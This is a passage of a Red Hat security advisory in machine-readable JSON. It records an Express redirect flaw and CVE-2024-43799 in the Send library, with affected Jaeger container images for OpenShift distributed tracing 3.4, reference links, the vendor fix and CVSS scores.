3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "express: Improper Input Handling in Express Redirects" }, { "cve": "CVE-2024-43799", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-10T15:30:30.869487+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311153" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", "title": "Vulnerability description" }, { "category": "summary", "text": "send: Code Execution Vulnerability in Send Library", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-43799" }, { "category": "external", "summary": "RHBZ#2311153", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799", "url": "https://www.cve.org/CVERecord?id=CVE-2024-43799" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799" }, { "category": "external", "summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", "url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35" }, { "category": "external", "summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", "url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg" } ], "release_date": "2024-09-10T15:15:17.727000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 